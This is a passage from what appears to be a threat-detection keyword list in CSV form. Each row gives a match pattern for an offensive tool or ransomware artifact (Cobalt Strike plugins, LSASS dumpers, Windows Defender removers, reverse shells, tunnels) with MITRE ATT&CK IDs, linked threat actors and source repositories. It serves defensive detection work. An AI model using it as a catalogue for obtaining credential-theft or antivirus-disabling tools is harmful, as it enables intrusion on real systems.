Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","40599" "*DecryptWinSCPPassword*",".{0,1000}DecryptWinSCPPassword.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","40600" "*dectokyo@cock.li*",".{0,1000}dectokyo\@cock\.li.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns 
retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40601" "*dectokyo@onionmail.org*",".{0,1000}dectokyo\@onionmail\.org.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40602" "*ded27a571bfbdf7f33a8582ba4d924604a825ed427c0e734d0b299328f2c544e*",".{0,1000}ded27a571bfbdf7f33a8582ba4d924604a825ed427c0e734d0b299328f2c544e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40603" "*deda1e50aa7963be239c0e43bb7dcd05014b1e048f89fe08f537ef0ce19afe58*",".{0,1000}deda1e50aa7963be239c0e43bb7dcd05014b1e048f89fe08f537ef0ce19afe58.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","40604" "*dedc1f4578fd081f28e2cca23dcb518fad39f9f782755bfa33e9723f32bb4487*",".{0,1000}dedc1f4578fd081f28e2cca23dcb518fad39f9f782755bfa33e9723f32bb4487.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation 
and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","40606" "*dedsec1da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd7871da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd787*",".{0,1000}dedsec1da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd7871da0b2abfcc58713bc8dd18ab16d9b9a9885ff813535ccd1e462fe7b979fd787.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","40608" 
"*DEDSEC-RANSOMWARE.py*",".{0,1000}DEDSEC\-RANSOMWARE\.py.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","1","N/A","N/A","10","1","7","1","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z","40609" "*DEED6795-9EC9-4B2C-95E0-9E465DA61755*",".{0,1000}DEED6795\-9EC9\-4B2C\-95E0\-9E465DA61755.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","40610" "*deef29cfacbf4ede0ee55bdf0a4d9c0aa8a53d33245849e7699c12148bd06865*",".{0,1000}deef29cfacbf4ede0ee55bdf0a4d9c0aa8a53d33245849e7699c12148bd06865.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40611" "*deepce.sh -e *",".{0,1000}deepce\.sh\s\-e\s.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","40612" "*DeEpinGh0st/Erebus*",".{0,1000}DeEpinGh0st\/Erebus.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","40613" "*deepinstinct/ContainYourself*",".{0,1000}deepinstinct\/ContainYourself.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","40614" 
"*deepinstinct/DCOMUploadExec*",".{0,1000}deepinstinct\/DCOMUploadExec.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","1","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","40615" "*deepinstinct/Dirty-Vanity*",".{0,1000}deepinstinct\/Dirty\-Vanity.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","1","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","40616" "*deepinstinct/Lsass-Shtinkering*",".{0,1000}deepinstinct\/Lsass\-Shtinkering.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","40617" "*deepinstinct/LsassSilentProcessExit*",".{0,1000}deepinstinct\/LsassSilentProcessExit.{0,1000}","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","N/A","10","5","445","61","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z","40618" "*deepinstinct/NoFilter*",".{0,1000}deepinstinct\/NoFilter.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","N/A","9","3","298","48","2024-10-29T07:30:35Z","2023-07-30T09:25:38Z","40619" "*deepinstinct/ShimMe*",".{0,1000}deepinstinct\/ShimMe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","1","N/A","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","40620" "*deepsound2john.py*",".{0,1000}deepsound2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","40621" "*def nemesis_post_data(*",".{0,1000}def\snemesis_post_data\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","40622" "*def46f338013e516bbe3823ab661abb80e80e1388f2b57c3aa9dedee7f4735be*",".{0,1000}def46f338013e516bbe3823ab661abb80e80e1388f2b57c3aa9dedee7f4735be.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","40626" "*defanger exclusion*",".{0,1000}defanger\sexclusion.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","40629" "*defanger realtime*",".{0,1000}defanger\srealtime.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","40630" "*defanger signature*",".{0,1000}defanger\ssignature.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","40631" "*default NIC of tun2socks is working on Spoofing mode*",".{0,1000}default\sNIC\sof\stun2socks\sis\sworking\son\sSpoofing\smode.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","N/A","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40632" "*default password:rebeyond*",".{0,1000}default\spassword\:rebeyond.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - 
T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#content","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","40633" "*default_userpass_for_services_unhash*",".{0,1000}default_userpass_for_services_unhash.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40635" "*default_users_for_services_unhash.txt*",".{0,1000}default_users_for_services_unhash\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40636" "*DefaultBeaconApi*",".{0,1000}DefaultBeaconApi.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 
Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","40637" "*DefaultCreds-cheat-sheet*",".{0,1000}DefaultCreds\-cheat\-sheet.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","N/A","10","6048","726","2025-04-15T13:13:19Z","2021-01-01T19:02:36Z","40638" "*DefaultListenAddr = "":7448""*",".{0,1000}DefaultListenAddr\s\=\s\""\:7448\"".{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","#content","default port","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","40639" "*--defaults-torrc*",".{0,1000}\-\-defaults\-torrc.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","8","4","396","56","2024-09-27T16:43:52Z","2023-02-09T02:08:07Z","40640" "*defc2b9e497d0fc59383dae3ae2bba2780be242d862ab6d44a5f7e0797ed9e6a*",".{0,1000}defc2b9e497d0fc59383dae3ae2bba2780be242d862ab6d44a5f7e0797ed9e6a.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","40641" "*DEFCON-25-Workshop-Ruben-Boobeb-UAC-0day*",".{0,1000}DEFCON\-25\-Workshop\-Ruben\-Boobeb\-UAC\-0day.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","40642" "*Defeat-Defender.bat*",".{0,1000}Defeat\-Defender\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","40643" "*defeat-defender.py*",".{0,1000}defeat\-defender\.py.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper 
protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","40644" "*Defeat-Defender-V1.3.ahk*",".{0,1000}Defeat\-Defender\-V1\.3\.ahk.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","40645" "*Defender Control v2.1 - Author by BlueLife*",".{0,1000}Defender\sControl\sv2\.1\s\-\sAuthor\sby\sBlueLife.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40646" "*Defender.Remover.exe*",".{0,1000}Defender\.Remover\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40647" "*DefenderCheck*",".{0,1000}DefenderCheck.{0,1000}","offensive_tool_keyword","DefenderCheck","Quick tool to help make evasion work a little bit easier.Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. 
This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.","T1027 - T1055 - T1562 - T1553","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/matterpreter/DefenderCheck","1","0","N/A","N/A","N/A","10","2431","436","2023-09-14T18:42:39Z","2019-04-09T14:03:46Z","40648" "*DefenderCheck.exe*",".{0,1000}DefenderCheck\.exe.{0,1000}","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","N/A","10","1185","143","2024-06-01T16:46:57Z","2020-10-08T11:22:26Z","40649" "*DefenderRemover.Phase1.exe*",".{0,1000}DefenderRemover\.Phase1\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40650" "*DefenderRemover.Phase2.exe*",".{0,1000}DefenderRemover\.Phase2\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40651" "*DefenderRemover.Phase3.exe*",".{0,1000}DefenderRemover\.Phase3\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40652" 
"*DefenderRemover.Phase4.exe*",".{0,1000}DefenderRemover\.Phase4\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40653" "*DefenderRemover.Phase5.exe*",".{0,1000}DefenderRemover\.Phase5\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","40654" "*DefenseEvasion_CodeSigning_PeSigningAuthHijack.py*",".{0,1000}DefenseEvasion_CodeSigning_PeSigningAuthHijack\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","40655" "*DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature.py*",".{0,1000}DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - 
